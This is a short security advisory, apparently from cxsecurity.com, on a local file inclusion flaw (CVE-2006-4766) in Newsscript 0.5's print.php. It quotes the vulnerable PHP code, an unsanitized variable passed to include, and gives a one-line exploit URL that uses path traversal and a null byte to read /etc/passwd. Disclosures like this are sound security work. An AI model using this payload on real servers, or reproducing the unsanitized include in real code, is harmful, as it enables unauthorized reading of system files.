Bug: Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability ( Ascii Version )

Search:
WLB2

Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability

Published
Credit
Risk
2006.09.19
Daftrix
Medium
CWE
CVE
Local
Remote
N/A
CVE-2006-4766
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
None
None

# Subject:
--- "Newsscript version 0.5 (print.php) Local File Inclusion Vulnerability "
# Vulnerable version:
--- "Newsscript version 0.5"
# Vendor URL:
--- Emaill - mail (at) webmaster-journal (dot) com [email concealed]
--- Website - http://webmaster-journal.com
# Available in:
---http://www.comscripts.com/scripts/php.wm-news.203.html

# Vulnerability:

--- Vulnerable code in print/print.php
--- $ide var is not sanitized and can be used to include files from local resources
--- 1 <html>
--- 2 <head>
--- 3 <?
--- 4 $file_name = "../".$ide.".txt";
--- 5 ?>
---

---

--- 27 include($file_name);

# Exploit:

--- http://localhost/newscript/print/print.php?ide=../../../../etc/passwd%00

# Discovered By:

--- Daftrix[at]Gmail.com

--- Daftrix Security Investigations

--- http://www.daftrix.com

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version